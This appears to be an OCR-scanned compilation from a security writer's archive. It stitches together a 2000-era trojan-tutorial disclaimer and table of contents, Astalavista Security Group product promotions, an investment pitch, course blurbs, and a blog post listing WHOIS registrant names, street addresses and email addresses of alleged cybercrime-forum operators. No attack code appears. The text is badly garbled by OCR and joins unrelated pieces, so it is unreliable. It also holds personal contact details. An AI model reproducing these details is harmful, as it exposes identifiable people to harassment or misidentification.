8.For the newbies 

9.Linux Section 

LO. Interviews 

L1.Final words 


It's me = pele is our second issue.I've changed the 

design and I've added several new things in the newsletter. 

I've also received a lot of e-mails about our magazine. 

People like it and they want more information here. 

The first issue was short one but of course every new 

issue has many new things added in it. 

['m pt people like it and we have MANY new subcribers every day. 
4lso we have much more visitors than before. 


The Most Popular anti-trojan program circa the 90’s with CEO and Managing Director - 
Dancho Danchev - Acting as Technical Collector of trojan horses 
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The Most Popular Trojan Horses Text Document Throughout The 90’s courtesy of CEO 
and Managing Director - Dancho Danchev - The Maniac. 
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|The Complete Trojans Text | ----<--- |wWritten On 
| (Security Related) | 

|by the MaNiAc | |3.04.2000 
[contact me at: themaniac@blackcode.com |-------- lttetetetet 
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This guide is for educational purposes only I do not take any responsibility about anything 

happen after reading the guide. I'm only telling you how to do this not to do it. It's your decision. 
If you want to put this text on your Site/FTP/Newsgroup or anything else you can do it but don't 

change anything without the permission of the author.I"ll be happy to see this text on other pages too. 


All copyrights reserved.You may destribute this text as long as it's not changed. 


ee ee ee ee ee ee ee ee 


Author Notes: 


I hope you like my texts and find thes useful. 

If you have any problem or some suggestion feel free to e-mail me but please don't send mails like 
“I want to hack the US government please help me” or “Tell me how to blind a trojan into a .jpg” 
“WHere can I get 8 portscanner” etc...... 

Be sure if I can help you with something I will do it. 

I've started writing security related tutorials and I hope you like that.I°ll try to cover 

much more topics in ay future texts and I want to thank to all of the people that like ay 

texts. 


See ee ee ee ee ee ee 


Here you can find other texts 
written by me or other friends: 
http://www. blackcode.com 
blacksun.box.sk 

neworder .box.sk 


l.what Is This Text About? 
2.What Is A Trojan Horse 
3.Trojans Today 

-4.The future of the trojans 
$.Anti-Virus Scanners 

-6.How You Can Get Infected? 
woes From ICQ 

cee From IRC 

etd From Attachment 

----- From Physical Access 
o---- From Trick 

-7.How Dangerous A Trojan Can Ge? 
-8.0ifferent Kinds Of Trojans 
lied Remote Access Trojans 
----- Password Sending Trojans 
-+--- Keyloggers 

«+06 Destructive Trojans 
eeces FTP Trojans 

~9.Who Can Infect You? 


Personal Project of CEO and Managing Director - Dancho Danchev - throughout the 90’s - 
"Security is Futile". 
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Personal Web Site Project of CEO and Managing Director - Dancho Danchev - through- 
out the 90’s - "Security is Futile". 
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Yet Another Personal Project of CEO and Managing Director - Dancho Danchev - throughout 
the 90’s - "Security is Futile": 


[39] 
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Security Portal,Unique Products And Services 
This is Framed Security Systems 
A Mast Visit For Everyone Interested In Computer Security 


UPDATED!!!.. The Complete Windows Trojans Paper -UPDATED!!! 


Unique Publication That Will Answer You All The Questions You've Ever Had About Windows Trojans.How They Work.How To Protect,How You Get Infected. 
If You're Interested In Reading More Publications Subscribe In The Newsletter You'll Find When Visiting The Publications Page. 


Most Downloaded Files: 
ezhounce.targz 
messala.tangz 
nmaplge 
psy BNC2.2.2.targz 
-B I B I've Ever Read Online!!! 
Trojans'W VBS 1. 


Free E-books Archive ~CLICK AGAIN TO ACCESS THE E-BOOKS! 
Free E-books Archive 2-CLICK AGAIN TO ACCESS THE E-BOOKS! 


Support Me And Vote For That Site If You Found What You Were Looking For Or Find It Interesting 


The following list of feature will offer insight on the upcoming core features products 
and community-based services and products 


New Core Astalavista Security Group 2.0 Products 


¢ Secure Desktop PC - Introducing the World’s most private and anonymous Desktop PC - 
The Quebes OS 


¢ Privacy Router - Introducing the World’s most secure and privacy-oriented VPN router part 
of the CHAVPN closed-access network group 


¢ Secure Mobile - Introducing the World’s most secure and versatile security and privacy- 
features enabled Mobile Device 


¢ Secure PC - Introducing the World’s most secure tamper-proof Desktop PC 


Secure Keyboard - Introducing the World’s most secure and privacy-proof security key- 
board 


Secure USB - Introducing the World’s most secure FIPS-validated USB storage device 


Wireless Penetration Appliance - Introducing the World’s leading Wireless Penetration Ap- 
pliance 


¢ Honeypot appliance - Introducing the World’s leading and most versatile honeypot appli- 
ane 


¢ Penetration Testing Appliance - Introducing the World’s Most versatile penetration testing 
appliance 
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Bluetooth Penetration Testing Appliance - Introducing the World’s most ubiqutous and 
secure Bluetooth Penetration Testing Appliance 


New Core Astalavista Security Group 2.0 Services 


Astalavista Malware Connector - Infected with Malware? Let our experts and Security Team 
take care of the rest 


Astalavista Cloud Antivirus - Introducing the World’s Premier Cloud-based Antivirus Scan- 
ner 


Astalavista DNS Security Service - Introducing the World’s Most Comprehensive Sensor 
Network for anticipating and responding to current and emerging threats 


Astalavista Web Site Malware Scanner - Are you a Web site Owner? Let our service auto- 
matically scan and detect and remove malicious software from your Web site 


Astalavista Honeypot Service - Interested in learning more about cyber threats? Consider 
becoming part of World’s Most Comprehensive Honeypot Sensor Network 


Astalavista Threat Intelligence Service - Worry about malicious software entering your 
network and data premises? Consider subscribing to The World’s Most Comprehensive 
Threat Intelligence gathering and sharing Service 


Astalavista Penetration Testing Service - Are you part of a security organization worrying 
about the latest threats facing your infrastructure? Consider becoming part of Astalav- 
ista’s Penetration Testing Service - the Woqrld’s Premier Penetration Testing on Demand 
Service. 


Astalavista Security Training Service - Interested in learning more about computer and 
network security? Consider becoming member of the World’s Most Versatile Portfolio of 
training courses and material 


New Core Astalavista Security Group 2.0 Community-Oriented Services 


Wargames Server - Want to learn new hacking and security tricks and tools of the trade? 
Consider obtaining access to our sophisticated Wargames Server 


Astalavista Security Group’s Security and Hacking Search Engine - Introducing the World’s 
Largest and Most Comprehensive Search Index of Hacking and Security Content 


Hacking Mailing List - Introducing the World’s leading and most proprietary Hacking Mail- 
ing List 


Hacking E-Zine - Introducing the World’s Leading Hacking E-zine featuring content from 
hundreds of security authors and experts from across the globe 
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¢ Bug Bounty - Do you have experience in finding security bugs and vulnerabilities? Con- 
sider joining the World’s Largest and Most Versatile Bug Bounty program 


¢ IRC Network - Are you a fan of IRC? Consider joining the World’s Largest Hacking and 
Security IRC Network and talk with us in real-time 


Security Conference - Introducing the World’s Leading and Premier Security Conference 
Event featuring thousands of security experts conversations and discussions 


Security Comic - Are you a fan of Comic Books? Consider obtaining access to the World’s 
Premier and Leading Information Security and Hacking Comic Book 


Security Incubator - Do you have an idea for a new security product or a service? Consider 
submitting your project proposal and we’ll be happy to assist with an investment proposal 


Security and Hacking E-Books - Introducing the World’s Leading in-house portfolio of Hack- 
ing and Security E-Books empowered by hundreds of security experts and authors across 
the globe 


* Job Search Engine - Interested in finding the latest and hottest security job? Consider 
obtaining access to the World’s Leading and Most Comprehensive Security Career Portal 


¢ Hacking Game - Enjoy playing computer games? Consider obtaining immediate access to 
Astalavista Security Group’s Flagship Online Premium Hacker Game - The Underground 


Hacking Radio - Enjoy listening to music and security podcasts? Consider obtaining access 
to Astalavista Security Group’s Security and Hacking Radio 


Security Podcast - Enjoy listening to the latest security news and events across the indus- 
try? Consider obtaining access to Astalavista Security Group’s Premium Security Podcast 


Security Newsletter - Enjoy keeping yourself updated with the latest security news and 
events across the industry? Consider obtaining access to Astalavista Security Group’s 
Security Newsletter 


Astalavista Security Group Community Premium Member Clubs - "The Future of Hacking and 
The Cyber Underground": 
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Astalavista Techno City 


7932 


[41] 


Astalavista VIP Lounge 
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(iit Astalavista Russian Underground 


[43] 


7933 


ey] Astalavista Chinese Paradise 
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Astalavista Security Startups 
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Astalavista Security Investors 
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Astalavista Military.OPS 
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Astalavista Intelligence Operations 
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Astalavista Law Enforcement OPS 
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Astalavista Elite Newbies 
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¢,) Astalavista Senior Programmers 
— YU 
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Secure Micro-Blogging Service 
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Astalavista Attracts The Following Audiences 


¢ Novice computer users 

e Enterprise Decision Makers 

¢ IT staff personnel 

¢ Non-profit organizations 

¢ Government and Military Institutions 


¢ Fortune 500 companies staff members 


Astalavista Experiences as Seen By Our Visitors 


These stories are taken from various talks with our visitors, their intention is to bring 
more insight in the various individuals using our site. 


¢ The System Administrator - "As an administrator of a network of one thousand computers, 
my job consists of guaranteeing that our applications are build in with security in mind, 
that our desktop computers are malware and spyware free, and, to a certain extent, that 
our users are aware of various computer security hazards. | visit Astalavista.com when- 
ever | look for something in particular, or just to follow the trends. Astalavista.com has 
obviously evolved during the years, it has turned into a daily updated security portal, 
emphasizing on the most severe security issues, not just listing tools and documents. 
When | visit the site, | Know | am up-to-date. Most of our desktop computers are using IE, 
something that is hopefully going to change after | show the statistics of spyware infec- 
tions to the management. Anyway, | came across some unique patches to IE at your site, 
which | applied on all the desktops. | also blocked all known CoolWebSearch ip ranges 
again by finding an article at your site. The best about Astalavista.com is that | never 
know what I’m going to find at the site on the next day. As your submissions cover so 
many IT/network/security/privacy/social/espionage topics, sometimes | cannot catch up 
with you, people. You’re resourceful!" 


¢ The Novice Computer User - "Mainly because this is one of the best sites related to security. 
| want knowledge, | want tools, | want to know some patch to improve the security of my 
computer, and no, | don’t want to become a hacker. | just care for protecting against 
the latest threats. Astalavista.com always provides me with content that | cannon find 
anywhere else; and the best thing is that you take the time and effort to update the site 
on a daily basis. | visit the site because it’s "for the people"; it’s as much as possible 
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ad-free, or whenever there are some ads, they’re not distracting or annoying - something 
that is rarely seen these days. When was the last time when you found something worth 
reading or using at the site, and how did it help you improve your security? Well, | learnt 
how | had been infected with viruses and worms all the time through a couple of tutorials. 
Now, I’m much more aware of what’s going on when | connect to the Internet. A couple 
of months ago | didn’t realize that my computer is under attack all the time. Now, | know 
that | can stop most of the threats if | first know that they exist - this is how the site helps 
me." 


The Researcher - "For me, Astalavista.com is still the underground site | used to visit during 
all these years. But if you hadn’t repositioned it into a more security related instead of 
a hacking oriented site, it would have probably become a public disaster, given the rise 
of the script kiddies and wannabe hackers these days. At the site | find code and docs | 
cannot find anywhere else - if | were to Google around, it would be pretty pointless. The 
best about the site is that it is always up-to-date. My job consists of analyzing malware 
and spyware activities around the Internet, and then providing a reliable, yet innovative 
solution to the problem. | am impressed by the amount of information | usually find - 
anything somehow related to my research at your site. When was the last time when 
you found something worth reading or using at the site, and how did it help you in your 
research? Spyware details, | find a lot of info about spyware trends, and, of course, the 
latest released backdoors, which | could analyze later on. The approach you use with 
your Security Directory is great. | can always look at another aspect of the topic just by 
following the next submission. My best regards to everything you do at the site, it is one 
of my favourite ones." 


The Corporate Representative - "As a CIO of a large enterprise, | always need to know 
what is in the wild, what might be next - proactive thinking plays an important role in my 
job. Your site is among the ones that I visit every day and sometimes it has more power to 
change my current strategy than some public survey or a computer crime statistics. We 
have realized that IE is not as secure as we thought it was by reconfiguring certain features. 
| myself have a very busy schedule so | do appreciate the amount of well-categorized 
information at one place - the way | see it at Astalavista. We were also able to identify 
O-day tools that bypass all of our desktop firewalls and allow the execution of malicious 
software. Currently we know more about the technique used and we have managed to 
block it. Astalavista.com gives me another vision - something that | cannot receive from 
the security companies we are working with." 


The Hacker - "Astalavista.com is a true underground site. By “underground” | don’t mean 
a place where illegal individuals exchange thoughts, tools etc. This is the only place, 
independent of products and companies, where people, even guys that I know, still submit 
tools and papers for the idea of doing it - not for the financial gains. I’m alive at Astalavista, 


for me it is like | got slash-dotted with knowledge, just because sooner or later everyone 
visits the site, and it’s the best place for all kinds of audiences. Although there’re a lot of 
tools at the site, it’s knowledge, not tool- oriented. When was the last time when you found 
something worth reading or using at the site, and how did it help you in your activities? 
People’s code, which | analyze later on, people’s papers and the way you present security 
information as a whole. Recently | found an advanced assembly-programming tutorial at 
the site. | had never come across such a good one before - it gave me useful tips and rare 
comments about them". 


Key Marketing Messages Include 


¢ Hack others and let others try to hack you and earn money in the process 


e Launch your own hacker and security company 


¢ Earn money for being a hacker and a security expert 


¢ Teach others and learn from others and earn money in the process 


¢ Learn how to find security bugs and break into computer systems and earn money in the 
process 


¢ Track down hackers as they try to attack your infrastructure and earn money in the process 
¢ Earn money from sharing and distributing security and hacking data and knowledge 
¢ Track down malicious attackers as they try to attack your infrastructure and earn money 


for participating 


Investment Proposal Presentation Screenshots: 


[73] 
7963 


Astalavista Security Group - 
Astalavista 2.0 — Investment Proposal 


Astalavista Security Group 2 
defining the Basics of Infor 
Security and Threat ta 


[74] 
What is Astalavista Securit 
What is Astalavista 2.0? 
Who's behind it? 


Key differentiation factors 
Key products and services 
Summary of Proposal 
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Contributor to HeloNetSecurity 


Managing Director of Astalavista Security 
Group 


security Consultant for Frame4 Security 


systems 


Contributor to TechGenix's 
WindowSecurity.com 


security blogger for ZDNet Zero Day, Threat 
Intelligence Analyst for Webroot 
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Search engine 


Job recruitment and talent manager 
Proprietary invite-only paid social me 
platform 

Security and hacking oriented 24/7 online 
Major security and hacking conference é 
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SecureCloud security router | 
PrivateOS privacy router 
Secure encrypted mobile phone 


Secure custom-branded email service 


A diverse portfolio of services target ig tt 
Information Security industry and the ha 
community | 


What We Do at the Office: 
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[88] 
What We Need and What You Get 


- Initial investment to expedite the process and to begin to work on the project right 
away and to define time-to-market 


- Possible relocation for the core founder including eventual office space 
- Investment commitment to ensure a smooth and proper launch of the platform 


- Financial and corporate mentorship to ensure that the project wouldn’t be left behind 


Sample Astalavista Security Group Security Training Material To Be Released Prior To 
The Official Launch 


Intelligence Services 
Geopolitical analysis 
OSINT analysis 
Strategic analysis 


Cyber threat analysis 
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Cyber jihad analysis 
Intelligence Training 

Basics of OSINT 

Basics of Cyber Jihad Analysis 
Basics of SIGINT 

Basics of COMINT 

OPSEC Basics 

Information Warfare Training 
Cyberwarfare Training 
Asymmetric Warfare Training 
Cyberterrorism training 
Information warfare dominance 
National security 

Basics of Intelligence Studies 
HUMINT 

SIGINT 

COMINT 

OPSEC 

Basics of CYBERINT 

Basics of Counter-Threat Intelligence 
Cyber Conflict 

Cyber Weapons 

Basics of Cybercrime Research 
Malware Analysis 


Basics of Threat Hunting 
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Malware Analysis for Beginners 
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Astalavista Security Group Security Training - 
Basics of OSINT 


Explore the Basics of OSINT 


Highlights 


w The Basics of OSINT Explained 

v In-depth Discussion on Public OSINT Tools 

v In-depth Discussion on Private OSINT Tools 

Vv In-depth and Comprehensive OSINT Case Stucties 

Vv’ In-depth and Extensive Real-World and OSINT Examples 


Language 


Englsh ous. 


+3 


Certificate 


o 
aR 
Level 


About Instructor 


gl Dancho Danchev 


Dancho Danchev is the worlds leading expert in the 


Change photo 


COURSE DETAILS 


Astalavta Security Group 2.0 - The Worlds Most Popular information Security Portal 
proud to present the general availability of a new course material entitled - Basics of 
OSINT (Open Source intelligence? aiming to familiarize potential Intellgence Analysts and 
security researchers with an in-depth understanding of the basics of OSINT (Open Source 
intetiigence? including in-depth discussion and demonstration of public and proprietary 
OSINT tools tactics techniques and procedures (TTPs) With millions of active users across 
the globe Astalavista Securty Group is proud to empower and provide the necessary data 
information and knowledge successfully reaching and empowering hundreds of 
thousands of users globally on a daily base 


Chapter 1: Introduction to OSINT 


Chapter 2: Basics of OSINT 


Chapter 3: OSINT Technolog 
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Astalavista Security Group Security Training - 
Basics of Cyberwarfare 


Explore of the Basics of Cyberware 


Change photo 


COURSE DETAILS 
Astalavista Secunty Group 2.0 - The Worlds Most Popular Information Secunty Portal is 
Highlights Proud to present the general availabity of 8 new course matenal entitled - The Basics of 
Cyberware offering an in-depth overview of the World of Cyberwarfare including in-depth 
wv What is Cybenwarfare? discussion of various technologies service providers offensive and Gefenstive cyberwarfare 


methodologies including in-depth discussion on various nation-state actors further offering 
an in-depth overview of current and emerging trends including an in-depth discussion on 
the future of cyberware 


¥ In-depth Discussion on the Basics of Cyberwarfare 

wv Overall overview of The Top C yberwarfare Senice 
Providers 

Vv In-depth Discussion on Nation-State Actors 


W Overview of Current and Emerging Cyberwarfare 
Services and Technologies 


Chapter1: Introduction to Cyberwarfare 


Certificate 


a 
aA 
Level 
No | Cr.. English (Us) 


Chapter 2: Basics of Cyberwarfare 


Chapter 3: Overview of Public Cyberwarfare Tools 


About Instructor 


Chapter 4: Overview of Proprietary Cyberwarfare Tools 
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Astalavista Security Group Security Training - 
Threat Intelligence 


Explore of Basics of Threat Intelligence 


COURSE DETAILS 

Astalavista Secunty Group 2.0 - The World's Most Popular information Secunty Portal is 

Highlights proud to present the general availabiity of a new course material enthied “The Basics of 

Threat intelligence’ o#enng novice and expenenced resecunty researchers and 

wv Overview of Threat Intelligence intelagence Analysts an in-depth overview of the Basics of Threat Intetagence offering an 

V’ In-Depth Discussion of Threat Intelligence in-depth overview of vanous tactics techniques and procedures (TTPs) including an in- 
Methodologes depth overview of public and proprietary Threat Intelligence toois including a general 

v In-Depth Overview of Public Threat Int o Tools discussion of related Future Threat intelligence methodologes 


Vv In-Depth Discussion of Proprietary Threat Intelligence 
Toots 
v In-Depth Discussion on Future Threat intelligence Toots 
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Astalavista Security Group Security Training - 
Basics of Cyber Jihad 


Explore the Basics of Cyber Jihad 


COURSE DETAILS 
Astalavista Security Group - The Worlds Most Popular Information Security Portal it proud 
Highlights to present the general availability of a new course material entitled - “The Basics of Cyber 
Jihad’ offering novice and expenenced secunty researchers and Intelligence Analysts an 
v The Basics of Cyber Jinad n-depth overview of Cyber Jihad including n-depth discussion of various coumer- 
wv Overview of Basic Cyber Jihad Detection and Prevention intelligence methodologies and approaches further ofering an m-depth discussion on 


current and emerging Cyber Jihad trends including an in-depth discussion of various 
current and emerging Cyber Jihad detection and response mechanisms 


Mechansms 

v in-depth Discussion on Pubic Cyber Ahad Detection 
Tools 

vw In-Depth Discussion on Proprietary Cyber Jihad 
Detection Tools 


Vv In-depth Discussion on Real-World Cyber Jihad Case =) 
Studies 


Chapter12: Ir to Cyber Jihad 


_ Chapter 2 5 of Cyber Jihad 


Chapter 3 n of Public Cyber Jihad T 


e 
ma 
Level 


Chapter 4: In-Depth [ ssion of Proprietary Cyber Jihad Too 
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Dancho Danchev is the world’s leading expert in the field of cybercrime fighting and threat 
intelligence gathering having actively pioneered his own methodology for processing threat 
intelligence leading to a successful set of hundreds of high-quality analysis and research 
articles published at the industry’s leading threat intelligence blog - ZDNet’s Zero Day, 
Dancho Danchev’s Mind Streams of Information Security Knowledge and Webroot’s Threat 
Blog with his research featured in Techmeme, ZDNet, CNN, PCWorld, SCMagazine, TheRegister, 
NYTimes, CNET, ComputerWorld, H+Magazine currently producing threat intelligence at the 
industry’s leading threat intelligence blog - Dancho Danchev’s - Mind Streams of Information 
Security Knowledge. 


With his research featured at RSA Europe, CyberCamp, InfoSec, GCHQ and Interpol the 
researcher continues to actively produce threat intelligence at the industry’s leading threat 
intelligence blog - Dancho Danchev’s - Mind Streams of Information Security Knowledge 
publishing a diverse set of hundreds of high-quality research analysis detailing the malicious 
and fraudulent activities at nation-state and malicious actors across the globe. 


Dancho Danchev currently maintains and has maintained one of the Security Industry’s 
leading Security Publications - Dancho Danchev’s Blog - Mind Streams of Information Security 
Knowledge since 2005 and has already received over 5M page views including the establish- 
ment of a loyal base of users with the idea to spread data information and knowledge on 
current and emerging Cyber Threats. 


Need to Know More? Get in touch with me today! 


Approach me at dancho.danchev@hush.com regarding this campaign including your do- 
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nation or sponsorship including general questions feedback press inquiries or anything related 
to this particular campaign. Looking forward to begin working with you. Stay tuned! 
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16.6.2. Announcing Law Enforcement and OSINT Intelligence Operation "Uncle 
George" - Join Me Today! - Part Three (2020-08-28 12:32) 
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Dear blog readers, 


I’ve decided to issue the following update in terms of my currently ongoing OSINT and Law 
Enforcement [2]Operation called "[3]Uncle George" which basically consists of all the publicly 
accessible IPs for all the currently active and publicly accessible cybercrime-friendly forum 
communities which I’ve recently presented in a series of blog posts entitled "[4]Exposing the 
Modern Cybercrime Ecosystem - A Compilation of Currently Active Cyberfrime-Friendly Forum 
Communities" including to present one of the most comprehensive [5]Cybercrime Forum Data 
Sets for 2019 which you can publicly download for the purpose of enriching and processing the 
actual data set which you can then use to contact me at dancho.danchev@hush.com for the 
purpose of sharing your findings and I’ll make sure to quickly feature the results in a series of 
upcoming blog posts. 


Grab a copy of the [6]Cybercrime Forum Data Set for 2019 from [7]here and drop me a line 
at dancho.danchev@hush.com in terms of sharing your findings and | will shortly feature the 
actual results in a separate blog post. 
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Sample WHOIS Registrar details for all the cybercrime-friendly communities which I’ve re- 
cently posted with the idea to take them offline and potentially assist U.S Law Enforcement 
on its way to track down and prosecute the cybercriminals behind these campaigns: 


1 &1 Internet Inc 
101DOMAIN-RU 

ACTIVE-RU 

AG402-IS 

ajans 

alessio zamparelli 

Almeida Capital 

ANON SEC SECURITY 
Anonymize, Inc. 

ARDIS-RU 

BEGET-RU 

birkan tekkan 

BITDEFENDER IPR MANAGEMENT LTD 
BO JIA 

BREACHFORUMS INC. 
BuyDomains.com 

c/o whoisproxy.com 

cabb 

Cetiga Indonesia 

chen hong min 

Chengdu Century Oriental Network Communication Co., Ltd. 
China Dior Industrial Co., Ltd. 
Combell nv 
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Contact Privacy Inc. 
Contact Privacy Inc. 
Contact Privacy Inc. 
Contact Privacy Inc. 
Contact Privacy Inc. 
Contact Privacy Inc. 
Contact Privacy Inc. 
Contact Privacy Inc. 
Contact Privacy Inc. 
Contact Privacy Inc. 
Contact Privacy Inc. 
Contact Privacy Inc. 
Contact Privacy Inc. 
Contact Privacy Inc. 
Contact Privacy Inc. 
Contact Privacy Inc. 
Contact Privacy Inc. 
Contact Privacy Inc. 
Contact Privacy Inc. 
Contact Privacy Inc. 


CSL Computer Service Langenbach GmbH d/b/a joker.com 


Cyberwizards 


Dallas Wass 


Customer 0132739424 
Customer 0139870618 
Customer 0143964070 
Customer 0155869181 
Customer 0156396373 
Customer 0157748846 
Customer 0158143945 
Customer 0158393870 
Customer 124166783 

Customer 1242184490 
Customer 1242229418 
Customer 1242469612 
Customer 1242926866 
Customer 1244285966 
Customer 1245153947 
Customer 1245977695 
Customer 1246912676 
Customer 1246938641 
Customer 1246947263 
Customer 1247324362 


DANESCO TRADING LTD. 


DATA CORE Corp. 
Data Protected 
DATA REDACTED 


Digital Gateway Networks A.S. 


Digital Privacy Corporation 


Domain Asset Holdings, LLC 


DOMAIN PRIVACY 


Domain Privacy Guard Sociedad Anénima Ltd 


Domain Privacy Service FBO Registrant. 


Domain Protection Services, Inc. 
DOMAINCONTEXT, INC. 


Domains By Proxy, LLC 
DOMENUS-RU 

DotMedia Limited 
Dropshipping Shop,S.L. 
duan yong 

DYNADOTS8 LLC 

DYNADOT LLC 

Dynadot LLC 

DYNADOT, LLC 
dz-devloper 

Elena Isaeva 

eName Technology Co.,Ltd. 
eonsofttech Itd 

EPAG Domainservices GmbH 
Favour Cathering services 
FORPSI-QBZ-S413384 
GANDI 

Gandi [Tag = GANDI] 
gaoqging 

Gazduire Enterprise SRL 
Gazi Mah Engin cad 

GDPR Masked 

Global Internet Services Ltd 
globalar (GlobalAR LLC) 
GMO-Z.com RUNSYSTEM JSC 
GoDaddy.com, LLC. 

Google LLC 

Gran Net Co.,Ltd 
Gtvrdwrax Aqmpbkzk 
Hacknews.organizasyonu 
HackYard Security Group 
hakan dursun 

hidden 

HN-Community 

Home Private 
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HostNext Technologies 
HugeDomains.com 
HUKOT-SMN-ALEXANDRE 
HUSH IP LLC 
Hush Whois Protection Ltd. 
ICI - Registrar 
Identity Protect Limited 
ISA 
JS14411-IS 
Key-Systems 
li xulong 
Liliya Anmudullina 
lishuxin 
Lolzteam 
MADALINA-ELENA IORGULESCU, DMD 
Mali Dili B.V. 
Milen Radumilo 
mmmm 
mohamed rafat 
Moniker Privacy Services 
MSF 
mth soft 
MyPrivacy.net Ltd. 
N/A 
NA 
na 
Nala Systems 
NAMEFIND CAYMAN ISLANDS LTD. 
NameFind LLC 
National Security Agency 
NAUNET-SU 
NETHOUSE-RU 
NETIM 
New Ventures Services, Corp 
NIC.UA LLC 
7993 


NicAgent 

None 

Not available 

Not Disclosed 

Not shown, please visit www.dnsbelgium.be for webbased whois. 
OPENPROV-RU 

Osano LLC 

OVH 

Personal data, can not be publicly disclosed according to applicable laws. 
PlanetHoster 

Privacy Protect, LLC (PrivacyProtect.org) 

Privacy protection service - whoisproxy.ru 

Private 

Private by Design, LLC 

Private Person 

Privatewhois biz 

Proxy Protection LLC 

RO1-RU 

RO1-SU 

Redacted 

REDACTED FOR PRIVACY 

Redacted for Privacy Purposes 

Redacted for privacy: some of the data in this object has been removed 
Registrant of goldenshop.cc 

Registrant of I3zr.com 

Registrant of smarthackerz.com 

Registrant State/Province: 


Registrant State/Province: \u0e01\u0e23\u0e38\ u0e07\u0e40\u0e17\u0e- 
leslashu0e21\u0e2b\u0e32\u0e 


Registrant State/Province: barbados 
Registrant State/Province: Bayern 
Registrant State/Province: Beykoz 
Registrant State/Province: Delhi 
Registrant State/Province: Florida 
Registrant State/Province: HONG KONG 
Registrant State/Province: izuminskiy 
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Registrant State/Province: kansas 
Registrant State/Province: merkez 
Registrant State/Province: Merseyside 
Registrant State/Province: Minas Gerais 
Registrant State/Province: New York 
Registrant State/Province: Other 
Registrant State/Province: Pays de Loire 
Registrant State/Province: Victoria 
Registrant Street: 
Registrant Street: 16 Osborne Close 
Registrant Street: 63-65 boulevard Massena 
Registrant Street: 233 Markey Street 
Registrant Street: ATTN: alm3refh.com, c/o No-IP.com Registration Privacy 
Registrant Street: Avenida Joao Lemos,1843 casa 
Registrant Street: Dergavina 59 720 
Registrant Street: Ha Dong - Ha Noi 
Registrant Street: hunanshengshaoyangxian 
Registrant Street: Jaenese 22 a 
Registrant Street: Jalan Gegar Taman Gegar 
Registrant Street: P.O. Box 0823-03411 
Registrant Street: P.O. Box 7051 
Registrant Street: PO BOX 30485 
Registrant Street: REDACTED FOR PRIVACY 
Registrant Street: Strada C. A. Rosetti 
Registrant Street: thon ong A- xa Sn ong- Sn Tay - Ha Ni O 
Registrant Street: ul.Nizhnyaya liniya 88/11 
Registrant Street: Ulan-Ude 
Registrar of domain names REG.RU LLC 
REGRU-RU 
REGRU-SU 
REGTIME-RU 
REGTIME-SU 
Repossessed by Go Daddy 
RH.NET.SA 
RU-CENTER-RU 

7995 


RUCENTER-SU 

SALENAMES-RU 

See PrivacyGuardian.org 

Shenzhen Honker Union Technology Co Ltd 
SilverSpam 

Softlayer Domain Privacy 

StaticUsers Networks 

This domain has been suspended 

TLD Registrar Solutions Ltd 

TransIP Group 

TrleaM.NeT 

Turkhackteam 

UAB "Esnet" 

united domains AG 

WHOIS IDCPrivacy Service c/o IDC (BVI) Limited 
Whois Privacy Corp. 

Whois Privacy Protection Service by onamae.com 
Whois Privacy Protection Service by VALUE-DOMAIN 
Whois Privacy Protection Service, Inc. 

Whois Privacy Service 

WhoisGuard, Inc. 

Whoisprotection.cc 

WHOISSHELTER.COM 

Wix.Com Ltd. 

Wuxi Yilian LLC 

Xiamen 35.Com Technology Co., Ltd 

yang hai tao 

ZG38-IS 

zhi hai qiang 


Zone Media LLC 
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Sample WHOIS Email Registrar details for all the cybercrime-friendly communities which I’ve 
recently posted with the idea to take them offline and potentially assist U.S Law Enforcement 
on its way to track down and prosecute the cybercriminals behind these campaigns: 


543a8085n39u14et@5225b4d0pi3627q9.whoisprivacycorp.com 
54290e6fogidbil5h@5225b4d0pi3627q9.whoisprivacycorp.com 
CRYPTERS.INFO@regprivate.ru 
2262cb08ef774b4781d40dec9abcb43f.protect@whoisguard.com 
darknet.so@superprivacyservice.com 
smith.jonn@apexscore.com 
pw-8b5aeef02d8da5c66bbd67823f7dcal6@privacyguardian.org 
pw-9cb75al1f67e1c1e52549992494e433c4@privacyguardian.org 
high-minded.net@myprivacy.net 
d1e65d732220488086d7f165bd0c77d9.protect@whoisguard.com 
contact@privacyprotect.org 
dns-admin@google.com 
51d7a7733a9f4104a938d544c1leb33f8.protect@whoisguard.com 
admin@osano.com 
bilzerian247.com@domainsbyproxy.com 
stardumps24.com@whoisproxy.ru 
e99cf9479a@goldenshop.cc.whoistrustee.com 
2f3ba7febcbb44ab879b3b8aa3e6e3bb.protect@whoisguard.com 
8452a99eb2b94bcb8aebd9f7acc0ea7d.protect@whoisguard.com 
fo802aaec8144fafbab7d45923a5d644.protect@whoisguard.com 
crimebiz.net@domainsbyproxy.com 
29267f38648a4f2b8592a00de0bb46dc.protect@whoisguard.com 
82bab3e421944bdd95042f44e00d46el1.protect@whoisguard.com 
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d4732e35bf5f4b2190bad2f22db68685.protect@whoisguard.com 
domains@hugedomains.com 

domaincontact@reg.xlink.net 
underground.ws@domainsbyproxy.com 
93d0b714c8fa4a6095bc1c83315f17ce.protect@whoisguard.com 
manshyz@hotmail.com 
8b5a21445b0c41c69aeeddc6f5484624.protect@whoisguard.com 
3d9960f868174404b6e46d66a35d5afd.protect@whoisguard.com 
2e0218b831d201b5-782150@privacy.no-ip.com 
aoreteam.com@domainsbyproxy.com 
AT4RE.COM@domainsbyproxy.com 
pw-2f7al7bfff84a05ef8a2c59da8d96965@privacyguardian.org 
DEV-POINT.COM@domainsbyproxy.com 

tps@live.fr 

gaza-hacker.net@contactprivacy.com 
1domains12345@gmail.com 


03889de4725e93fb634f6e53b06cfc2c70950ecclaba6c06fe81848e7 9ff032c@i313. 
cc.whoisproxy.org 


8e90alafla@I3zr.com.whoistrustee.com 
lb-h.com@domainsbyproxy.com 
b325a2fd5c214b4495e3a21932d1f032.protect@whoisguard.com 
info@force-host.com 

VBSPIDERS.COM@domainsbyproxy.com 

domains@rh.net.sa 
d683a264d6214972a663086c7dc2b9c1.protect@whoisguard.com 
5e2a3e5c4ad646cfbe6el13ee9a2ac701.protect@whoisguard.com 
e548ee5717394004b128b94c74dbae6b.protect@whoisguard.com 
pw-49258146a845288bf6757d23c173e811@privacyguardian.org 
4cac96b3cda641c5a4f60998d982bb61.protect@whoisguard.com 
info@domain-contact.org 
f2542e23187b46ef91c5517484235f27.protect@whoisguard.com 
accessroot.com@domainprivacygroup.com 
anhluong25071998@gmail.com 
9dcc44cb8del143cc9738d6cbbd1dc0c2.protect@whoisguard.com 
xg2008jb8cd9b9xb7ivw@n.o-w-o.info 
BESTBLACKHATFORUM.COM@domainsbyproxy.com 
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a42eee9e38284319a5067ceb0a1a0197.protect@whoisguard.com 
